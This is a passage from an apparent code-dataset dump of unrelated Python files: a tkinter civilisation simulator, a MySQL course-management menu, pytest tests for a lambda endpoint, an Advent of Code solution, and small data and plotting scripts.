food:\\t\"+str(round(dic_civ[2][\"food\"],2))+\"\\nmoderates food:\\t\"+str(round(dic_civ[3][\"food\"],2)))\n self.iron_label.configure(text=\"warriors iron:\\t\"+str(round(dic_civ[1][\"iron\"],2))+\"\\nexperts iron:\\t\"+str(round(dic_civ[2][\"iron\"],2))+\"\\nmoderates iron:\\t\"+str(round(dic_civ[3][\"iron\"],2)))\n self.population_label.configure(text=\"warriors population :\\t\"+str(round(dic_civ[1][\"population\"],2))+\"\\nexpert population :\\t\"+str(round(dic_civ[2][\"population\"],2))+\"\\nmoderate population :\\t\"+str(round(dic_civ[3][\"population\"],2)))\n self.food_paid_label.configure(text=\"warriors food paid per turn :\\t\"+str(round(dic_civ[1][\"population\"] / 2000,2))+\"\\nexpert food paid per turn :\\t\"+str(round(dic_civ[2][\"population\"] / 2000,2))+\"\\nmoderate food paid per turn :\\t\"+str(round(dic_civ[3][\"population\"] / 2000,2)))\n self.food_turn_label.configure(text=\"warriors food per turn :\\t\"+str(round(dic_civ[1][\"food_per_turn\"],2))+\"\\nexpert food per turn :\\t\"+str(round(dic_civ[2][\"food_per_turn\"],2))+\"\\nmoderate food per turn :\\t\"+str(round(dic_civ[3][\"food_per_turn\"],2)))\n self.territories_label.configure(text=\"warriors territories :\\t\"+str(round(dic_civ[1][\"territories\"],2))+\"\\nexpert territories :\\t\"+str(round(dic_civ[2][\"territories\"],2))+\"\\nmoderate territories :\\t\"+str(round(dic_civ[3][\"territories\"],2)))\n '''\n\n def show_once(self,first=False):\n if not first:\n for i in range(len(self.m)):\n for j in range(len(self.m[i])):\n if self.pre_m[i][j] != self.m[i][j]:\n list = self.sub.grid_slaves(i,j)\n if len(list) !=0:\n list[0].grid_forget()\n if self.m[i][j] % 10 == 1:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image1, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.bor_image1, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 2:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image2, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.bor_image2, bd=2,\n 
bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 3:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image3, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.bor_image3, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 4:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image4, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.bor_image4, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 5:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image5, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.bor_image5, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 6:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image6, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.bor_image6, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n\n sticky=NW)\n else:\n for i in range(len(self.m)):\n for j in range(len(self.m[i])):\n if self.pre_m[i][j] != self.m[i][j]:\n list = self.sub.grid_slaves(i, j)\n if len(list) != 0:\n list[0].grid_forget()\n if self.m[i][j] % 10 == 1:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image1, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.image1_c, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 2:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image2, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.image2_c, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 3:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image3, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.image3_c, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 4:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image4, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.image4_c, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 5:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image5, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.image5_c, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n sticky=NW)\n elif self.m[i][j] % 10 == 6:\n if self.m[i][j] % 100 < 10:\n Label(self.sub, image=self.image6, bd=0).grid(row=i, column=j, sticky=NW)\n else:\n Label(self.sub, image=self.image6_c, bd=2,\n bg=civ_color(((self.m[i][j] % 100) - (self.m[i][j] % 10)) / 10)).grid(row=i,\n column=j,\n\n sticky=NW)\n\n\n\n def spawn_new_civ(self):\n if (self.m>=10).all():\n tkinter.messagebox.showwarning(title=\"Impossible\",message=\"Map filled. 
Can't create a new civ.\")\n        else:\n            self.civ_frame = Toplevel(self.root)\n            self.CivList = (\"expert\", \"warrior\",\"moderate\")\n            self.civmenu_v = StringVar()\n            self.civmenu_v.set(self.CivList[0])\n            self.label4 = Label(self.civ_frame, text=\"Choose civ type :\")\n            self.label4.grid(row=0, column=0, sticky=W)\n            self.civto = OptionMenu(self.civ_frame, self.civmenu_v, *self.CivList)\n            self.civto.grid(row=0, column=1, sticky=W)\n            self.label5 = Label(self.civ_frame, text=\"After submitting, click on the map the position \\nwhere it should spawn (must be unconquered).\\nPress the c key to cancel after submit.\")\n            self.label5.grid(row=1, column=0, sticky=W)\n            self.civsubmit = Button(self.civ_frame, text=\"Submit civ\", command=self.submit_civ)\n            self.civsubmit.grid(row=2, column=1, sticky=W)\n\n    def submit_civ(self):\n        self.civ_frame.destroy()\n        self.root.bind(\"<Button-1>\",self.place_civ)\n        self.root.bind(\"<c>\",self.cancel_creation)\n\n    def place_civ(self,event):\n        new_y, new_x = self.sub.grid_location(event.x_root - self.sub.winfo_rootx(), event.y_root - self.sub.winfo_rooty())\n        print(new_x)\n        print(new_y)\n        if math.floor(self.m[new_x][new_y] / 10)>0:\n            tkinter.messagebox.showerror(title=\"Used area\",message=\"Please select a free space. To cancel creation, press the c key.\")\n        else:\n            create_civ(self.civmenu_v.get())\n            self.root.unbind(\"<Button-1>\")\n            self.root.unbind(\"<c>\")\n            self.m = spawn_civ(dic_civ[civ_counter],self.m,new_x,new_y)\n            list = self.sub.grid_slaves(new_x, new_y)\n            list[0].grid_forget()\n            field = self.m[new_x][new_y]%10\n            field_image = self.image1_c\n            if field == 1:\n                field_image = self.image1_c\n            elif field == 2:\n                field_image = self.image2_c\n            elif field == 3:\n                field_image = self.image3_c\n            elif field == 4:\n                field_image = self.image4_c\n            elif field == 5:\n                field_image = self.image5_c\n            elif field == 6:\n                field_image = self.image6_c\n            Label(self.sub, image=field_image, bd=2,bg=civ_color(civ_counter)).grid(row=new_x,column=new_y,sticky=NW)\n\n    def cancel_creation(self,event):\n        tkinter.messagebox.showinfo(title=\"Canceled Creation\",message=\"Creation canceled.\")\n        self.root.unbind(\"<Button-1>\")\n        self.root.unbind(\"<c>\")\n\n    def copy_map(self):\n        if self.turn == 0:\n            self.pre_m = np.random.randint(0, 1, (45, 45))\n        else:\n            np.copyto(self.pre_m,self.m)\n\n    def higher_gap(self,iteration):\n        if iteration <=2000:\n            return 1\n        elif iteration <=2500:\n            return 2\n        elif iteration <=3000:\n            return 4\n        elif iteration <= 3500:\n            return 8\n        return 10\n\n    def simulate(self):\n        L=[]\n        self.turn += 1\n        dyn = self.dyn_type\n        #print(dyn)\n        self.copy_map()\n        #print(self.pre_m)\n        if dyn == 1:\n            for k in dic_civ:\n                if dic_civ[k][\"food\"]<0:\n                    self.m = safe_reaction(k, self.m)\n                else:\n                    dic_civ[k][\"reaction\"] = 0\n                    self.m = dynamics_civ(dic_civ[k], self.m)\n                L.append(k)\n            for i in L:\n                update_population(dic_civ[i])\n                update_trading()\n                if dic_civ[i][\"population\"] <= 0:\n                    delete_civ(self.m, dic_civ[i])\n        elif dyn == 2:\n            self.m = iterate(self.m)\n        self.show_once()\n        self.update_labels()\n        #print(\"Once\")\n\n        #print(self.m)\n\n        '''print(\"warriors food:\\t\", dic_civ[1][\"food\"])\n        print(\"experts food:\\t\", dic_civ[2][\"food\"])\n        print(\"moderates food:\\t\", dic_civ[3][\"food\"])\n        print(\"warriors iron:\\t\", dic_civ[1][\"iron\"])\n        print(\"experts iron:\\t\", dic_civ[2][\"iron\"])\n        print(\"moderates iron:\\t\", dic_civ[3][\"iron\"])\n        print(\"warriors population :\\t\", dic_civ[1][\"population\"])\n        print(\"expert population :\\t\", dic_civ[2][\"population\"])\n        print(\"moderate population :\\t\", 
dic_civ[3][\"population\"])\n print(\"warriors food paid per turn :\\t\", dic_civ[1][\"population\"] / 2000)\n print(\"expert food paid per turn :\\t\", dic_civ[2][\"population\"] / 2000)\n print(\"moderate food paid per turn :\\t\", dic_civ[3][\"population\"] / 2000)\n print(\"warriors food per turn :\\t\", dic_civ[1][\"food_per_turn\"])\n print(\"expert food per turn :\\t\", dic_civ[2][\"food_per_turn\"])\n print(\"moderate food per turn :\\t\", dic_civ[3][\"food_per_turn\"])\n print(\"warriors territories :\\t\", dic_civ[1][\"territories\"])\n print(\"expert territories :\\t\", dic_civ[2][\"territories\"])\n print(\"moderate territories :\\t\", dic_civ[3][\"territories\"])'''\n\n\nShow()\n","sub_path":"AREcivV2.6.py","file_name":"AREcivV2.6.py","file_ext":"py","file_size_in_byte":58103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"393065130","text":"import subprocess as sp\nimport pymysql\nimport pymysql.cursors\nfrom insertions import *\nfrom updates import *\nfrom deletions import *\nfrom functional import *\nfrom analysis import *\nfrom showtables import *\n\n\ndef createAccount():\n row = {}\n print(\"Enter new Account details: \")\n name = (input(\"Name (Fname Lname): \")).split(' ')\n row['First_name'] = name[0]\n row['Family_name'] = name[1]\n row['Email_id'] = input(\"Email_id: \")\n row['Password'] = input(\"Password: \")\n row['Mobile'] = input(\"Mobile_no: \")\n row['Sex'] = input(\"Sex: \")\n\n row['Address'] = []\n n = int(input(\"Number of Addresses: \"))\n for i in range(n):\n row['Address'].append(input(\"Address {}: \".format(i + 1)))\n\n subclass = input(\"Are you a INSTRUCTOR or STUDENT ? : \")\n\n if subclass == \"STUDENT\":\n row['Roll_no'] = int(input(\"Roll_no: \"))\n row['Batch'] = input(\"Batch: \")\n elif subclass == \"INSTRUCTOR\":\n row['Degree'] = []\n n = int(input(\"Number of Degrees: \"))\n for i in range(n):\n row['Degree'].append(input(\"Degree {}: \".format(i + 1)))\n\n print(insert_account(con, row, subclass))\n\n\ndef createTeam():\n row = {}\n print(\"Enter new Team details: \")\n row['Team_name'] = input(\"Team Name: \")\n row['Course_name'] = input(\"Course Name: \")\n row['Details'] = input(\"Details: \")\n row['Admin_id'] = input(\"Admin Email_id: \")\n\n row['Textbook'] = []\n n = int(input(\"Number of Textbooks: \"))\n for i in range(n):\n row['Textbook'].append(input(\"Textbook {}: \".format(i + 1)))\n\n print(insert_team(con, row))\n\n\ndef createChannel():\n row = {}\n print(\"Enter Channel details: \")\n row['Team_name'] = input(\"Team Name\")\n row['Channel_name'] = input('Channel Name')\n\n print(insert_channel(con, row))\n\n\ndef addMeeting():\n row = {}\n print(\"Enter Meeting details: \")\n row['Team_name'] = input(\"Team Name: \")\n row['Channel_name'] = input(\"Channel Name: \")\n row['Org_id'] = input(\"Organiser Email_id: \")\n row['Start_time'] = input(\"Start Time (YYYY-MM-DD HH:MM:SS): \")\n row['End_time'] = input(\"End Time (YYYY-MM-DD HH:MM:SS): \")\n\n print(insert_meeting(con, row))\n\n\ndef addMember():\n row = {}\n print(\"Enter Details: \")\n row['Team_name'] = input(\"Team Name: \")\n row['Member_id'] = input(\"Member Email_id: \")\n\n print(insert_membership(con, row))\n\n\ndef addAttendee():\n row = {}\n print(\"Enter Details: \")\n row['Team_name'] = input(\"Team Name: \")\n row['Channel_name'] = input(\"Channel Name: \")\n row['Org_id'] = input(\"Organiser Email_id: \")\n row['SRoll_no'] = int(input(\"Attendee Roll_no: \"))\n row['Start_time'] = input(\n 
\"Enter meeting start time (YYYY-MM-DD HH:MM:SS):\")\n\n print(insert_attends(con, row))\n\n\ndef addQuestion():\n row = {}\n print(\"Enter Question Details: \")\n row['Q_id'] = int(input(\"Q_id: \"))\n row['Qn_text'] = input(\"Question Text: \")\n row['Course_name'] = input(\"Course Name: \")\n\n print(insert_question(con, row))\n\n\ndef addAnswer():\n row = {}\n print(\"Enter Answer Details\")\n row['Q_id'] = int(input(\"Q_id: \"))\n row['Answer'] = input(\"Answer: \")\n row['Marks'] = int(input(\"Marks: \"))\n\n print(insert_quesans(con, row))\n\n\ndef addQuiz():\n row = {}\n print(\"Enter Quiz Details: \")\n row['Quiz_no'] = int(input(\"Quiz_no: \"))\n row['Course_name'] = input(\"Course Name: \")\n row['No_of_qn'] = int(input(\"Number of Questions: \"))\n\n print(insert_quiz(con, row))\n\n\ndef addQuizStudent():\n row = {}\n print(\"Enter Details: \")\n row['SRoll_no'] = int(input(\"Student Roll_no: \"))\n row['Quiz_no'] = int(input(\"Quiz_no: \"))\n row['Course_name'] = input(\"Course Name: \")\n\n print(insert_gives(con, row))\n\n\ndef addResponse():\n row = {}\n print(\"Enter Response Details: \")\n row['Quiz_no'] = int(input(\"Quiz_no: \"))\n row['Course_name'] = input(\"Course Name: \")\n row['Q_id'] = int(input(\"Q_id: \"))\n row['SRoll_no'] = int(input(\"Student Roll_no: \"))\n row['Inst_Email_id'] = input(\"Instructor Email_id: \")\n row['Answer'] = input(\"Answer: \")\n row['Marks'] = int(input(\"Enter marks allotted:\"))\n\n print(insert_response(con, row))\n\n\ndef updateMarks():\n print(\"Enter Details: \")\n q_id = int(input(\"Q_id: \"))\n ans = input(\"Answer: \")\n new_marks = int(input(\"New Marks: \"))\n\n print(update_marks(con, q_id, ans, new_marks))\n\n\ndef updateAddress():\n print(\"Enter Details: \")\n email = input(\"Email_id: \")\n old_add = input(\"Old Address: \")\n new_add = input(\"New Address: \")\n\n print(update_address(con, email, old_add, new_add))\n\n\ndef updateMobile():\n print(\"Enter Details: \")\n email = input(\"Email_id: \")\n new_mob = input(\"New Mobile Number: \")\n\n print(update_mobile(con, email, new_mob))\n\n\ndef deleteAccount():\n print(\"Enter Details: \")\n email = input(\"Email_id: \")\n\n print(delete_account(con, email))\n\n\ndef dispatch(ch):\n try:\n if(ch == '1'):\n createAccount()\n elif(ch == '2'):\n createTeam()\n elif(ch == '3'):\n addMember()\n elif(ch == '4'):\n createChannel()\n elif(ch == '5'):\n addMeeting()\n elif(ch == '6'):\n addAttendee()\n elif(ch == '7'):\n addQuestion()\n elif(ch == '8'):\n addAnswer()\n elif(ch == '9'):\n addQuiz()\n elif(ch == '10'):\n addQuizStudent()\n elif(ch == '11'):\n addResponse()\n elif(ch == '12'):\n updateMarks()\n elif(ch == '13'):\n updateAddress()\n elif(ch == '14'):\n updateMobile()\n elif(ch == '15'):\n deleteAccount()\n elif(ch == '16'):\n sel1(con)\n elif(ch == '17'):\n sel2(con)\n elif(ch == '18'):\n sel3(con)\n elif(ch == '19'):\n sel4(con)\n elif(ch == '20'):\n proj1(con)\n elif(ch == '21'):\n proj2(con)\n elif(ch == '22'):\n agg1(con)\n elif(ch == '23'):\n agg2(con)\n elif(ch == '24'):\n search(con)\n elif(ch == '25'):\n analysis1(con)\n elif(ch == '26'):\n analysis2(con)\n elif(ch == '27'):\n analysis3(con)\n elif(ch == '28'):\n show1(con)\n elif(ch == '29'):\n show2(con)\n elif(ch == '30'):\n show3(con)\n elif(ch == '31'):\n show4(con)\n elif(ch == '32'):\n show5(con)\n elif(ch == '33'):\n show6(con)\n elif(ch == '34'):\n show7(con)\n elif(ch == '35'):\n show8(con)\n elif(ch == '36'):\n show9(con)\n else:\n print(\"Invalid Option\")\n\n except Exception as e:\n tmp = 
sp.call('clear', shell=True)\n print(e)\n tmp = input(\"Enter any key to CONTINUE>\")\n\n\ncon = []\nwhile(1):\n tmp = sp.call('clear', shell=True)\n\n username = input(\"Enter username:\")\n password = input(\"Enter password:\")\n port = input(\"Enter port num(leave blank for default):\")\n if port == \"\":\n port = 3306\n else:\n port = int(port)\n\n try:\n con\n con = pymysql.connect(host='localhost', user=username, password=password, port=port,\n db='DfOEP', cursorclass=pymysql.cursors.DictCursor)\n tmp = sp.call('clear', shell=True)\n\n if(con.open):\n print(\"Connected\")\n else:\n print(\"Failed to connect\")\n\n tmp = input(\"Enter any key to CONTINUE>\")\n\n while(1):\n tmp = sp.call('clear', shell=True)\n print(\"0. Exit\")\n print()\n print(\"Insertions: \")\n print(\"1. Create a new Account.\")\n print(\"2. Create a new Team.\")\n print(\"3. Add Member to a Team.\")\n print(\"4. Create a new Channel.\")\n print(\"5. Add a new Meeting.\")\n print(\"6. Add Attendee for a Meeting.\")\n print(\"7. Add a Question.\")\n print(\"8. Add Answer and Marks for a Question\")\n print(\"9. Add a Quiz.\")\n print(\"10. Add Student who gives a Quiz.\")\n print(\"11. Add Response for a Quiz.\")\n print()\n print(\"Updations: \")\n print(\"12. Update Marks of a Question.\")\n print(\"13. Update Address of an Account.\")\n print(\"14. Update Mobile Number of an Account.\")\n print()\n print(\"Deletions: \")\n print(\"15. Delete an Account.\")\n print()\n print(\"Selections: \")\n print(\"16. Print Course Details and preferred textbooks of a Team.\")\n print(\"17. List Members of a Team.\")\n print(\"18. List Members of a Meeting.\")\n print(\"19. Find Marks per Question of a Quiz.\")\n print()\n print(\"Projections: \")\n print(\"20. Details of all Students in a Batch.\")\n print(\"21 Top 10 scoring Students in a Batch.\")\n print()\n print(\"Aggregate Functions: \")\n print(\"22. Average Marks of Students in Quizzes for the Course.\")\n print(\"23. Attendance of a Student.\")\n print()\n print(\"Search Functions: \")\n print(\"24. Search Student Details.\")\n print()\n print(\"Analysis: \")\n print(\"25. Measure effectiveness of online teaching.\")\n print(\"26. Student Report Card.\")\n print(\"27. Relation between Student's Marks and Attendance.\")\n print()\n print(\"Show Tables: \")\n print(\"28. List all Accounts in the database.\")\n print(\"29. Print Address of an Account.\")\n print(\"30. List all Students in the database.\")\n print(\"31. List all Instructors in the database.\")\n print(\"32. Print Degrees of an Instructor.\")\n print(\"33. List all Teams an Account is part of.\")\n print(\"34. List all Channels in a Team.\")\n print(\"35. List all Teams in the database.\")\n print(\"36. 
List all Quizzes in a Course.\")\n print()\n\n ch = input(\"Enter choice > \")\n tmp = sp.call('clear', shell=True)\n if ch == '0':\n break\n elif(ch != \"\"):\n dispatch(ch)\n tmp = input(\"Enter any key to CONTINUE>\")\n\n except:\n tmp = sp.call('clear', shell=True)\n print(\"Connection Refused: Either username or password is incorrect or user doesn't have access to database\")\n tmp = input(\"Enter any key to CONTINUE>\")\n break\n","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"140161825","text":"import json\n\nfrom pytest_cases import (\n cases_data,\n CaseDataGetter,\n)\n\nfrom lambda_functions.v1.functions.checklists.app.checklists import (\n lambda_handler,\n transform_event_to_sirius_payload,\n validate_event,\n)\nfrom lambda_functions.v1.tests.helpers.use_test_data import (\n is_valid_schema,\n load_data,\n build_aws_event,\n)\nfrom lambda_functions.v1.tests.checklists import checklists_endpoint_test_cases\n\n\ndef test_lambda_handler(\n patched_requests, patched_get_secret, patched_validate_event_success\n):\n event = load_data(\"checklists_event.json\", as_json=False)\n context = None\n\n result = lambda_handler(event=event, context=context)\n assert result[\"statusCode\"] == 201\n assert is_valid_schema(result, \"standard_lambda_response_schema.json\")\n assert is_valid_schema(json.loads(result[\"body\"]), \"201_created_schema.json\")\n\n\ndef test_lambda_handler_fail(\n patched_requests, patched_get_secret, patched_validate_event_fail\n):\n event = load_data(\"checklists_event.json\", as_json=False)\n context = None\n\n result = lambda_handler(event=event, context=context)\n assert result[\"statusCode\"] == 400\n assert is_valid_schema(result, \"standard_lambda_response_schema.json\")\n\n\n@cases_data(module=checklists_endpoint_test_cases)\ndef test_validate_event(case_data: CaseDataGetter):\n body, case_ref, report_id, expected_result = case_data.get()\n path_params = {\"caseref\": case_ref, \"id\": report_id}\n event = build_aws_event(\n event_body=json.dumps(body), event_path_parementers=path_params, as_json=False\n )\n\n valid_event, errors = validate_event(event)\n\n assert valid_event == expected_result[0]\n assert sorted(errors) == sorted(expected_result[1])\n\n\ndef test_transform_event_to_sirius_request(\n default_checklists_request_body,\n default_request_case_ref,\n default_request_report_id,\n default_sirius_checklists_request,\n):\n path_params = {\"caseref\": default_request_case_ref, \"id\": default_request_report_id}\n event = build_aws_event(\n event_body=json.dumps(default_checklists_request_body),\n event_path_parementers=path_params,\n as_json=False,\n )\n\n payload = transform_event_to_sirius_payload(event)\n\n assert is_valid_schema(json.loads(payload), \"sirius_documents_payload_schema.json\")\n assert payload == json.dumps(default_sirius_checklists_request)\n\n\ndef test_transform_event_to_sirius_request_with_no_report_submission(\n default_request_case_ref,\n nondigital_request_report_id,\n checklists_request_body_with_no_report_submission,\n sirius_checklists_request_with_no_report_submission,\n):\n path_params = {\n \"caseref\": default_request_case_ref,\n \"id\": nondigital_request_report_id,\n }\n event = build_aws_event(\n event_body=json.dumps(checklists_request_body_with_no_report_submission),\n event_path_parementers=path_params,\n as_json=False,\n )\n\n payload = 
transform_event_to_sirius_payload(event)\n\n assert is_valid_schema(json.loads(payload), \"sirius_documents_payload_schema.json\")\n assert payload == json.dumps(sirius_checklists_request_with_no_report_submission)\n\n\ndef test_sirius_request_has_report_id_from_path(\n default_checklists_request_body,\n default_request_case_ref,\n default_request_report_id,\n default_sirius_checklists_request,\n):\n default_checklists_request_body[\"checklist\"][\"data\"][\"attributes\"][\n \"report_id\"\n ] = \"uuid_from_attributes\"\n path_params = {\"caseref\": default_request_case_ref, \"id\": \"uuid_from_path\"}\n event = build_aws_event(\n event_body=json.dumps(default_checklists_request_body),\n event_path_parementers=path_params,\n as_json=False,\n )\n\n payload = transform_event_to_sirius_payload(event)\n\n assert json.loads(payload)[\"metadata\"][\"report_id\"] == \"uuid_from_path\"\n","sub_path":"lambda_functions/v1/tests/checklists/test_checklists_endpoint.py","file_name":"test_checklists_endpoint.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"111445795","text":"#!/usr/bin/python3\n\nimport time\nimport itertools\n\n#################\n# Part 1\n#################\n\n\ndef calc_frequency(sequence: [], f=0) -> int:\n \"\"\"\n sequence: sequence of frequency changes\n f: initial frequency f\n \"\"\"\n for df in sequence:\n f = f + df\n return f\n\n\ndef input_to_sequence(inputstr: str) -> []:\n seq = [int(l) for l in inputstr.split()]\n return seq\n\n\ndef part1test():\n # test examples\n testinput = \"\"\"\n +1\n -2\n +3\n +1\n \"\"\"\n testinput_sequence = [1, -2, 3, 1]\n\n assert (input_to_sequence(testinput) == testinput_sequence)\n\n assert (calc_frequency([1, -2, 3, 1]) == 3)\n assert (calc_frequency([1, 1, 1]) == 3)\n assert (calc_frequency([1, 1, -2]) == 0)\n assert (calc_frequency([-1, -2, -3]) == -6)\n print(\"tests passed\")\n\n\ndef part1(myinput: str) -> None:\n result = calc_frequency(input_to_sequence(myinput))\n print(\"answer:\" + str(result))\n\n\n###############\n# Part 2\n###############\n\ndef find_repeatedfreq(sequence: [], f=0) -> int:\n freqs = set([f])\n for df in itertools.cycle(sequence):\n f = f + df\n if f not in freqs:\n freqs.add(f)\n else:\n return f\n\ndef part2test() -> None:\n # test input\n testinput_sequence = [1, -2, 3, 1]\n test_output = find_repeatedfreq(testinput_sequence)\n assert (test_output == 2)\n\n assert (find_repeatedfreq([+1, -1]) == 0)\n assert (find_repeatedfreq([+3, +3, +4, -2, -4]) == 10)\n assert (find_repeatedfreq([-6, +3, +8, +5, -6]) == 5)\n assert (find_repeatedfreq([+7, +7, -2, -7, -4]) == 14)\n print(\"tests passed\")\n\n\ndef part2(myinput: str) -> None:\n myinput_sequence = input_to_sequence(MYINPUT)\n result = find_repeatedfreq(myinput_sequence)\n print(\"answer:\" + str(result))\n\n###############\n# Main\n###############\n\n\nif __name__ == \"__main__\":\n\n # my input\n with open('data/day1') as f:\n MYINPUT = f.read()\n\n print(\"Part 1:\")\n part1test()\n t0 = time.time()\n part1(MYINPUT)\n print(\"time: \" + str(time.time() - t0))\n \n \n print(\"Part 2:\")\n part2test()\n t0 = time.time()\n part2(MYINPUT)\n print(\"time: \" + str(time.time() - t0))\n","sub_path":"day01_chronalcalibration.py","file_name":"day01_chronalcalibration.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"107078095","text":"import pandas as pd\nimport 
PySimpleGUI as sg\nimport numpy as np\nfrom AI import data\nfrom func import returnarray\n\ndef GUI2(df):\n    col=returnarray(df.columns)\n    layout=[[sg.Text('Wrangling and description')],\n            [sg.Listbox(values=col),sg.ReadButton('+/-'),sg.Listbox(values=[])], \n            [sg.Text('Correlation:'),sg.ReadButton('view',key='corr')], \n            [sg.Text('anova:'),sg.ReadButton('view',key='anova')], \n            [sg.Text('pearson:'),sg.ReadButton('view',key='pearson')],\n            [sg.VerticalSeparator(pad=None)],\n            [sg.Text('description:'),sg.ReadButton('view',key='desc')], \n            [sg.Text('group-pivot:'),sg.Text('index:'),sg.Input(),sg.Text('column:'),sg.Input(),sg.ReadButton('view',key='piv')],\n            #no more separator\n            [sg.Text('frame:'),sg.Combo(['plot','hist'])],# results and plotting \n            [sg.Input(),sg.ReadButton('Execute'),sg.Input()]]\n    window = sg.Window('preprocessing', layout)\n    while True:\n        event, values = window.Read()\n        if event == \"Execute\":\n            if values[0]==True and values[2] is not None:\n                df[values[1]]=eval(values[2]) # eval, not exec: exec always returns None\n            if values[3]==True:\n                df[values[4]]=df[values[4]].astype(values[5])\n            if values[6]==True:\n                df[values[7]]=df[values[7]].replace(np.nan,values[8]) # assign back, replace is not in-place\n            if values[9]==True:\n                df.dropna(subset=[values[10]],axis=int(values[11]),inplace=True)\n            if values[12]==True:\n                bins=np.linspace(min(df[values[13]]),max(df[values[13]]),int(values[14])+1)\n                group=returnarray(values[15])\n                df['new'+values[13]]=pd.cut(df[values[13]],bins,labels=group,include_lowest=True)\n        if event is None or event == \"Fin\": # also exit when the window is closed\n            window.Close()\n            break","sub_path":"GUI2.py","file_name":"GUI2.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"555815563","text":"from matplotlib import pyplot as plt\r\n\r\nx = range(2, 26, 2)\r\ny = [12, 16, 18, 22, 26, 15, 19, 18, 26, 23, 14, 17]\r\nfig = plt.figure(figsize=(20, 8), dpi=80)\r\nplt.plot(x, y)\r\nplt.xticks(range(2, 25, 1))\r\nplt.yticks(range(min(y), max(y)+1))\r\nplt.savefig(\"./m01.png\")\r\nplt.show()\r\n","sub_path":"matplotlib 01.py","file_name":"matplotlib 01.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"635293433","text":"def solve():\n\tvillages.sort()\n\n\tboundaries = []\n\n\tfor i in range(n - 1):\n\t\tvillage_left = villages[i]\n\t\tvillage_right = villages[i + 1]\n\n\t\tboundary = (village_left + village_right) / 2\n\t\tboundaries.append(boundary)\n\n\tmin_neighborhood = float(\"inf\")\n\n\tfor i in range(n - 2):\n\t\tneighborhood = boundaries[i + 1] - boundaries[i]\n\n\t\tif neighborhood < min_neighborhood:\n\t\t\tmin_neighborhood = neighborhood\n\n\treturn min_neighborhood\n\n\nn = int(input())\n\nvillages = []\n\nfor _ in range(n):\n\tposition = int(input())\n\n\tvillages.append(position)\n\nsol = solve()\nprint(sol)","sub_path":"2018/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"486893176","text":"import random\nfrom types import IntType\nfrom persistent import Persistent\nfrom BTrees.IIBTree import IIBTree\nfrom zope.interface import implements, Interface\n\nRETRIES = 1000\nLOWER = 100001\nUPPER = 999999\n\n\nclass 